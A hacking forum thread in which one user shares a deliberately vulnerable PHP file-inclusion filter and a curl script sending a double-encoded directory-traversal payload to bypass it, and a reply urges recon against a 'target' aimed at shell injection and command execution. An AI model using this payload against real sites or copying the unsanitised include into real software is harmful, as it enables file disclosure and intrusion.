Bypass LFI filter with double encoding

[peanutbutter]

Hi guys,

I'm trying to bypass a lfi filter using double encoding:
https://www.owasp.org/index.php/Double_Encoding

I made three files to see whether it would work, but it doesn't, it will remove everything except the file name.

../include.php: the file I want to include

PHP Code:

<?php
echo"hi";
?>

test.php: lfi filter that I try to bypass

PHP Code:

<?php
error_reporting(E_ALL);
ini_set('display_errors', 'On');
$_GET['sFile'] = str_replace("../","",strtolower($_GET['sFile']));
$_GET['sFile'] = str_replace("./","",$_GET['sFile']);
$_GET['sFile'] = str_replace("%2e%2e%2f","",$_GET['sFile']);
$_GET['sFile'] = str_replace("%2e%2f","",$_GET['sFile']);
include($_GET['sFile']);
?>

exploit.php: the script that sends the payload

PHP Code:

<?php
$ch = curl_init();
/* double encoding of "../" => "%252E%252E%252F" */
curl_setopt($ch, CURLOPT_URL, "http://url/lfitest/tst/test.php?sFile=%252E%252E%252Finclude.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$sOutput = curl_exec($ch);
curl_close($ch);
echo $sOutput;
?>

Any help would be greatly appreciated.
Thanks in advance!

[blahblahblah]

-snip-

Questions...
Are you attempting lfi to get some lfi exploits in your exp. Or from not being able to identify more vulns off the target? Lfi point to bigger flaws that are lying around. Possible Shell injections and Remote cmd executions etc... Sqli isn't the easiest to go for imo, as many high end sites have dropped $ on detection of many attacks etc... I only run into blind/time Sqli these days.

Have you done proper recon on your target?
What was your recon approach?
Recon is key to much of exploitation. Minimizes time used in acquiring correct exploitation methods. Scanners are OK but you're better off using burp pro or some good manual techniques AFTER you identified key details on target such as Os, Server, DB etc...